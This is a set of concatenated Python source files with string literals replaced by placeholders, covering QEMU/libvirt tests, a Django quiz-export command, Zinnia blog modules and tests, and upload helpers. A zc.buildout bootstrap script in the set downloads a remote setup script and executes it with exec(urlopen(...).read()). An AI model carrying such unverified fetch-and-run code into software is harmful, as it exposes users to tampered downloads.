"""<STR_LIT>""" <EOL> volume . XMLDesc . return_value = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> qemu . disk_clone ( hypervisor , '<STR_LIT:foo>' , pool , { '<STR_LIT:image>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT>' : True } } ) <EOL> results = pool . createXML . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> results = results . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_clone_error ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . Mock ( ) <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . storageVolLookupByPath . side_effect = libvirt . 
libvirtError ( '<STR_LIT>' ) <EOL> with self . assertRaises ( RuntimeError ) as error : <EOL> qemu . disk_clone ( hypervisor , '<STR_LIT:foo>' , pool , { '<STR_LIT:image>' : '<STR_LIT>' , '<STR_LIT>' : { } } ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> class ResourcesTest ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_initialize_default ( self , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' } } ) <EOL> libvirt_mock . open . assert_called_with ( '<STR_LIT>' ) <EOL> create_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , network_name = None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_initialize_hypervisor ( self , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' } } ) <EOL> libvirt_mock . open . assert_called_with ( '<STR_LIT>' ) <EOL> create_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , network_name = None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_initialize_clone ( self , pool_mock , disk_mock , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> pool_mock . return_value = pool <EOL> volume = mock . Mock ( ) <EOL> volume . path . return_value = '<STR_LIT>' <EOL> pool . storageVolLookupByName . return_value = volume <EOL> resources = qemu . 
QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } ) <EOL> pool_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> disk_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , pool , { '<STR_LIT:image>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> create_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , network_name = None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_initialize_network ( self , network_mock , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> network = mock . Mock ( ) <EOL> network . name . return_value = '<STR_LIT>' <EOL> network_mock . return_value = network <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' } } ) <EOL> network_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> create_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , network_name = '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_cleanup ( self , delete_mock , pool_delete_mock , network_delete_mock , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' } } ) <EOL> resources . _domain = mock . Mock ( ) <EOL> resources . _network = mock . Mock ( ) <EOL> resources . _hypervisor = mock . Mock ( ) <EOL> resources . 
_storage_pool = mock . Mock ( ) <EOL> resources . cleanup ( ) <EOL> delete_mock . assert_called_with ( resources . domain , mock . ANY ) <EOL> pool_delete_mock . assert_called_with ( resources . storage_pool , mock . ANY ) <EOL> network_delete_mock . assert_called_with ( resources . network ) <EOL> self . assertTrue ( resources . _hypervisor . close . called ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from . win_soup import WinSoup </s>
<s> import sys <EOL> from os . path import basename <EOL> from django . core . management . base import BaseCommand <EOL> from django . template import Template , Context <EOL> from yaksh . models import Quiz , QuestionPaper <EOL> result_template = Template ( '''<STR_LIT>''' ) <EOL> def results2csv ( filename , stdout ) : <EOL> """<STR_LIT>""" <EOL> qs = Quiz . objects . all ( ) <EOL> if len ( qs ) > <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> for q in qs : <EOL> stdout . write ( '<STR_LIT>' % ( q . id , q . description ) ) <EOL> quiz_id = int ( raw_input ( "<STR_LIT>" ) ) <EOL> try : <EOL> quiz = Quiz . objects . get ( id = quiz_id ) <EOL> except Quiz . DoesNotExist : <EOL> stdout . write ( "<STR_LIT>" % quiz_id ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> quiz = qs [ <NUM_LIT:0> ] <EOL> papers = QuestionPaper . objects . filter ( quiz = quiz , <EOL> user__profile__isnull = False ) <EOL> stdout . write ( "<STR_LIT>" % ( quiz . description , <EOL> basename ( filename ) ) ) <EOL> f = open ( filename , '<STR_LIT:w>' ) <EOL> context = Context ( { '<STR_LIT>' : papers } ) <EOL> f . write ( result_template . render ( context ) ) <EOL> f . close ( ) <EOL> stdout . write ( '<STR_LIT>' ) <EOL> class Command ( BaseCommand ) : <EOL> args = '<STR_LIT>' <EOL> help = '''<STR_LIT>''' <EOL> def handle ( self , * args , ** options ) : <EOL> """<STR_LIT>""" <EOL> results2csv ( args [ <NUM_LIT:0> ] , self . stdout ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> gettext = lambda s : s <EOL> DEBUG = True <EOL> DATABASES = { '<STR_LIT:default>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> USE_TZ = True <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> SITE_ID = <NUM_LIT:1> <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> LANGUAGES = ( <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 
'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } <EOL> } <EOL> ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> from zinnia . xmlrpc import ZINNIA_XMLRPC_METHODS <EOL> XMLRPC_METHODS = ZINNIA_XMLRPC_METHODS </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> from django . utils . encoding import force_text <EOL> from django . utils . encoding import force_bytes <EOL> from zinnia . settings import MARKDOWN_EXTENSIONS <EOL> from zinnia . settings import RESTRUCTUREDTEXT_SETTINGS <EOL> def textile ( value ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import textile <EOL> except ImportError : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> RuntimeWarning ) <EOL> return value <EOL> return textile . textile ( force_text ( value ) , <EOL> encoding = '<STR_LIT:utf-8>' , output = '<STR_LIT:utf-8>' ) <EOL> def markdown ( value , extensions = MARKDOWN_EXTENSIONS ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import markdown <EOL> except ImportError : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> RuntimeWarning ) <EOL> return value <EOL> return markdown . markdown ( force_text ( value ) , extensions = extensions ) <EOL> def restructuredtext ( value , settings = RESTRUCTUREDTEXT_SETTINGS ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> from docutils . core import publish_parts <EOL> except ImportError : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> RuntimeWarning ) <EOL> return value <EOL> parts = publish_parts ( source = force_bytes ( value ) , <EOL> writer_name = '<STR_LIT>' , <EOL> settings_overrides = settings ) <EOL> return force_text ( parts [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> raise ImproperlyConfigured ( '<STR_LIT>' ) <EOL> def backend ( entry ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from io import StringIO <EOL> from urllib . error import URLError <EOL> from urllib . response import addinfourl <EOL> except ImportError : <EOL> from urllib import addinfourl <EOL> from urllib2 import URLError <EOL> from cStringIO import StringIO <EOL> from django . test import TestCase <EOL> from zinnia . models . entry import Entry <EOL> from zinnia . ping import URLRessources <EOL> from zinnia . ping import DirectoryPinger <EOL> from zinnia . ping import ExternalUrlsPinger <EOL> from zinnia . signals import disconnect_entry_signals <EOL> class NoThreadMixin ( object ) : <EOL> def start ( self ) : <EOL> self . run ( ) <EOL> class NoThreadDirectoryPinger ( NoThreadMixin , DirectoryPinger ) : <EOL> pass <EOL> class NoThreadExternalUrlsPinger ( NoThreadMixin , ExternalUrlsPinger ) : <EOL> pass <EOL> class DirectoryPingerTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> disconnect_entry_signals ( ) <EOL> params = { '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:content>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . entry = Entry . objects . create ( ** params ) <EOL> def test_ping_entry ( self ) : <EOL> pinger = NoThreadDirectoryPinger ( '<STR_LIT>' , [ self . entry ] , <EOL> start_now = False ) <EOL> self . assertEqual ( <EOL> pinger . ping_entry ( self . entry ) , <EOL> { '<STR_LIT:message>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } ) <EOL> self . assertEqual ( pinger . results , [ ] ) <EOL> def test_run ( self ) : <EOL> pinger = NoThreadDirectoryPinger ( '<STR_LIT>' , [ self . entry ] ) <EOL> self . assertEqual ( <EOL> pinger . 
results , <EOL> [ { '<STR_LIT>' : True , <EOL> '<STR_LIT:message>' : '<STR_LIT>' } ] ) <EOL> class ExternalUrlsPingerTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> disconnect_entry_signals ( ) <EOL> params = { '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:content>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . entry = Entry . objects . create ( ** params ) <EOL> def test_is_external_url ( self ) : <EOL> r = URLRessources ( ) <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , True ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , True ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , False ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' % r . site_url , r . site_url ) , False ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , r . site_url ) , True ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , r . site_url ) , False ) <EOL> def test_find_external_urls ( self ) : <EOL> r = URLRessources ( ) <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> external_urls = pinger . find_external_urls ( self . entry ) <EOL> self . assertEqual ( external_urls , [ ] ) <EOL> self . entry . content = """<STR_LIT>""" % r . site_url <EOL> self . entry . save ( ) <EOL> external_urls = pinger . find_external_urls ( self . entry ) <EOL> self . assertEqual ( external_urls , [ '<STR_LIT>' ] ) <EOL> def test_find_pingback_href ( self ) : <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> result = pinger . find_pingback_href ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , None ) <EOL> result = pinger . find_pingback_href ( """<STR_LIT>""" ) <EOL> self . 
assertEqual ( result , '<STR_LIT>' ) <EOL> result = pinger . find_pingback_href ( """<STR_LIT>""" ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> result = pinger . find_pingback_href ( """<STR_LIT>""" ) <EOL> self . assertEqual ( result , None ) <EOL> def fake_urlopen ( self , url ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in url : <EOL> response = StringIO ( '<STR_LIT>' ) <EOL> return addinfourl ( response , { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:Content-Type>' : <EOL> '<STR_LIT>' } , url ) <EOL> elif '<STR_LIT:localhost>' in url : <EOL> response = StringIO ( <EOL> '<STR_LIT>' ) <EOL> return addinfourl ( response , { '<STR_LIT:Content-Type>' : <EOL> '<STR_LIT>' } , url ) <EOL> elif '<STR_LIT>' in url : <EOL> response = StringIO ( '<STR_LIT>' ) <EOL> return addinfourl ( response , { '<STR_LIT>' : '<STR_LIT>' } , url ) <EOL> elif '<STR_LIT:error>' in url : <EOL> raise URLError ( '<STR_LIT>' ) <EOL> def test_pingback_url ( self ) : <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> self . assertEqual ( <EOL> pinger . pingback_url ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def test_find_pingback_urls ( self ) : <EOL> import zinnia . ping <EOL> self . original_urlopen = zinnia . ping . urlopen <EOL> zinnia . ping . urlopen = self . fake_urlopen <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> urls = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . assertEqual ( <EOL> pinger . find_pingback_urls ( urls ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> zinnia . ping . urlopen = self . original_urlopen <EOL> def test_run ( self ) : <EOL> import zinnia . ping <EOL> self . original_urlopen = zinnia . ping . urlopen <EOL> zinnia . ping . urlopen = self . fake_urlopen <EOL> self . entry . content = """<STR_LIT>""" <EOL> pinger = NoThreadExternalUrlsPinger ( self . entry ) <EOL> self . assertEqual ( pinger . 
results , [ <EOL> '<STR_LIT>' ] ) <EOL> zinnia . ping . urlopen = self . original_urlopen </s>
<s> """<STR_LIT>""" <EOL> from django . conf . urls import url <EOL> from zinnia . urls import _ <EOL> from zinnia . views . tags import TagList <EOL> from zinnia . views . tags import TagDetail <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , <EOL> TagList . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> TagDetail . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( _ ( r'<STR_LIT>' ) , <EOL> TagDetail . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import shutil <EOL> import sys <EOL> import tempfile <EOL> from optparse import OptionParser <EOL> tmpeggs = tempfile . mkdtemp ( ) <EOL> usage = '''<STR_LIT>''' <EOL> parser = OptionParser ( usage = usage ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = '<STR_LIT>' , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = ( "<STR_LIT>" ) ) <EOL> options , args = parser . parse_args ( ) <EOL> to_reload = False <EOL> try : <EOL> import pkg_resources <EOL> import setuptools <EOL> except ImportError : <EOL> ez = { } <EOL> try : <EOL> from urllib . request import urlopen <EOL> except ImportError : <EOL> from urllib2 import urlopen <EOL> exec ( urlopen ( '<STR_LIT>' <EOL> ) . read ( ) , ez ) <EOL> setup_args = dict ( to_dir = tmpeggs , download_delay = <NUM_LIT:0> ) <EOL> ez [ '<STR_LIT>' ] ( ** setup_args ) <EOL> if to_reload : <EOL> reload ( pkg_resources ) <EOL> import pkg_resources <EOL> for path in sys . path : <EOL> if path not in pkg_resources . working_set . entries : <EOL> pkg_resources . working_set . add_entry ( path ) <EOL> ws = pkg_resources . working_set <EOL> cmd = [ sys . executable , '<STR_LIT:-c>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , tmpeggs ] <EOL> find_links = os . environ . get ( <EOL> '<STR_LIT>' , <EOL> options . find_links or <EOL> ( '<STR_LIT>' <EOL> if options . accept_buildout_test_releases else None ) <EOL> ) <EOL> if find_links : <EOL> cmd . extend ( [ '<STR_LIT>' , find_links ] ) <EOL> setuptools_path = ws . find ( <EOL> pkg_resources . Requirement . parse ( '<STR_LIT>' ) ) . 
location <EOL> requirement = '<STR_LIT>' <EOL> version = options . version <EOL> if version is None and not options . accept_buildout_test_releases : <EOL> import setuptools . package_index <EOL> _final_parts = '<STR_LIT>' , '<STR_LIT>' <EOL> def _final_version ( parsed_version ) : <EOL> for part in parsed_version : <EOL> if ( part [ : <NUM_LIT:1> ] == '<STR_LIT:*>' ) and ( part not in _final_parts ) : <EOL> return False <EOL> return True <EOL> index = setuptools . package_index . PackageIndex ( <EOL> search_path = [ setuptools_path ] ) <EOL> if find_links : <EOL> index . add_find_links ( ( find_links , ) ) <EOL> req = pkg_resources . Requirement . parse ( requirement ) <EOL> if index . obtain ( req ) is not None : <EOL> best = [ ] <EOL> bestv = None <EOL> for dist in index [ req . project_name ] : <EOL> distv = dist . parsed_version <EOL> if _final_version ( distv ) : <EOL> if bestv is None or distv > bestv : <EOL> best = [ dist ] <EOL> bestv = distv <EOL> elif distv == bestv : <EOL> best . append ( dist ) <EOL> if best : <EOL> best . sort ( ) <EOL> version = best [ - <NUM_LIT:1> ] . version <EOL> if version : <EOL> requirement = '<STR_LIT>' . join ( ( requirement , version ) ) <EOL> cmd . append ( requirement ) <EOL> import subprocess <EOL> if subprocess . call ( cmd , env = dict ( os . environ , PYTHONPATH = setuptools_path ) ) != <NUM_LIT:0> : <EOL> raise Exception ( <EOL> "<STR_LIT>" , <EOL> repr ( cmd ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> ws . add_entry ( tmpeggs ) <EOL> ws . require ( requirement ) <EOL> import zc . buildout . buildout <EOL> if not [ a for a in args if '<STR_LIT:=>' not in a ] : <EOL> args . append ( '<STR_LIT>' ) <EOL> if options . config_file is not None : <EOL> args [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ '<STR_LIT:-c>' , options . config_file ] <EOL> zc . buildout . buildout . main ( args ) <EOL> shutil . rmtree ( tmpeggs ) </s>
<s> import os <EOL> from functools import wraps <EOL> from StringIO import StringIO <EOL> import extensions as ext <EOL> from . models import Upload <EOL> def require_storage ( f ) : <EOL> @ wraps ( f ) <EOL> def wrapper ( * args , ** kw ) : <EOL> if not ext . storage : <EOL> ext . storage = ext . Storage ( ) <EOL> return f ( * args , ** kw ) <EOL> return wrapper <EOL> @ require_storage <EOL> def save_file ( name , data ) : <EOL> f = ext . storage . save ( name , data ) <EOL> name = f . name . decode ( '<STR_LIT:utf-8>' ) <EOL> url = f . url . decode ( '<STR_LIT:utf-8>' ) <EOL> ext . db . session . add ( Upload ( name = name , url = url ) ) <EOL> ext . db . session . commit ( ) <EOL> @ require_storage <EOL> def save_images ( name , data , images ) : <EOL> f = ext . storage . save ( name , data ) <EOL> name = f . name . decode ( '<STR_LIT:utf-8>' ) <EOL> url = f . url . decode ( '<STR_LIT:utf-8>' ) <EOL> upload = Upload ( name = name , url = url ) <EOL> for size , image in images . iteritems ( ) : <EOL> imageio = StringIO ( ) <EOL> image . save ( imageio , format = image . ext ) <EOL> f = ext . storage . save ( <EOL> '<STR_LIT>' % ( <EOL> os . path . splitext ( name ) [ <NUM_LIT:0> ] , <EOL> size , <EOL> image . ext <EOL> ) , <EOL> imageio <EOL> ) <EOL> setattr ( upload , u'<STR_LIT>' % size , f . name . decode ( '<STR_LIT:utf-8>' ) ) <EOL> setattr ( upload , u'<STR_LIT>' % size , f . url . decode ( '<STR_LIT:utf-8>' ) ) <EOL> ext . db . session . add ( upload ) <EOL> ext . db . session . commit ( ) <EOL> def save ( data , name = None ) : <EOL> if name is None : <EOL> name = data . filename <EOL> data = data . read ( ) <EOL> datafile = StringIO ( data ) <EOL> if ext . resizer : <EOL> try : <EOL> images = ext . resizer . resize_image ( datafile ) <EOL> except IOError : <EOL> return save_file ( name , data ) <EOL> save_images ( name , data , images ) <EOL> else : <EOL> return save_file ( name , data ) <EOL> @ require_storage <EOL> def delete ( upload ) : <EOL> ext . 
storage . delete ( upload . name ) <EOL> if ext . resizer : <EOL> for size in ext . resizer . sizes . iterkeys ( ) : <EOL> if getattr ( upload , size + '<STR_LIT>' ) : <EOL> ext . storage . delete ( getattr ( upload , size + '<STR_LIT>' ) ) <EOL> ext . db . session . delete ( upload ) <EOL> ext . db . session . commit ( ) </s>
<s> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] > <NUM_LIT:2> : <EOL> basestring = str <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> DATA = """<STR_LIT>""" <EOL> class NodeList ( list ) : <EOL> """<STR_LIT>""" <EOL> def find ( self , name ) : <EOL> for node in self : <EOL> if node == name : <EOL> return node <EOL> return None <EOL> def find_all ( self , name ) : <EOL> res = NodeList ( ) <EOL> for node in self : <EOL> if node == name : <EOL> res . append ( node ) <EOL> return res <EOL> def to_completion ( self ) : <EOL> return [ ( n . name + "<STR_LIT>" , n . name ) for n in self ] <EOL> COMPILED_NODES = NodeList ( ) <EOL> COMPILED_HEADS = NodeList ( ) <EOL> class ScopeNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , parent = None , children = None ) : <EOL> self . name = name <EOL> self . parent = parent <EOL> self . children = children or NodeList ( ) <EOL> self . level = parent and parent . level + <NUM_LIT:1> or <NUM_LIT:1> <EOL> def add_child ( self , child ) : <EOL> self . children . append ( child ) <EOL> def tree ( self ) : <EOL> if self . parent : <EOL> return self . name + '<STR_LIT:.>' + self . parent . tree ( ) <EOL> else : <EOL> return self . name <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , basestring ) : <EOL> return str ( self ) == other <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> def __repr__ ( self ) : <EOL> ret = self . name <EOL> if self . children : <EOL> ret += "<STR_LIT>" % '<STR_LIT:U+0020>' . join ( repr ( child ) for child in self . children ) <EOL> return ret <EOL> lines = DATA . split ( "<STR_LIT:\n>" ) <EOL> indent = "<STR_LIT:U+0020>" * <NUM_LIT:4> <EOL> indent_level = <NUM_LIT:0> <EOL> indents = { } <EOL> for line in lines : <EOL> if line . isspace ( ) or not len ( line ) : <EOL> continue <EOL> if line . startswith ( indent * ( indent_level + <NUM_LIT:1> ) ) : <EOL> indent_level += <NUM_LIT:1> <EOL> if not line . 
startswith ( indent * indent_level ) : <EOL> for level in range ( indent_level - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> if line . startswith ( indent * level ) : <EOL> indent_level = level <EOL> break <EOL> parent = indents [ indent_level - <NUM_LIT:1> ] if indent_level - <NUM_LIT:1> in indents else None <EOL> node = ScopeNode ( line . strip ( ) , parent ) <EOL> indents [ indent_level ] = node <EOL> if parent : <EOL> parent . add_child ( node ) <EOL> else : <EOL> COMPILED_HEADS . append ( node ) <EOL> COMPILED_NODES . append ( node ) </s>
